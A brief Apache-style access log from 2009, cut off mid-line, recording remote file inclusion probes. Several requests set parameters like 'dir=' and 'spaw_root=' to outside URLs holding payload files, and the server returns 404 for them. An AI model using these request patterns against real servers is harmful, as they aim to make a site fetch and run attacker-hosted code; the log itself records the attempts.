94.102.6.154 - - [28/Sep/2009:03:37:11 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:03:37:11 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:03:38:19 -0700] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.zytologie.de//i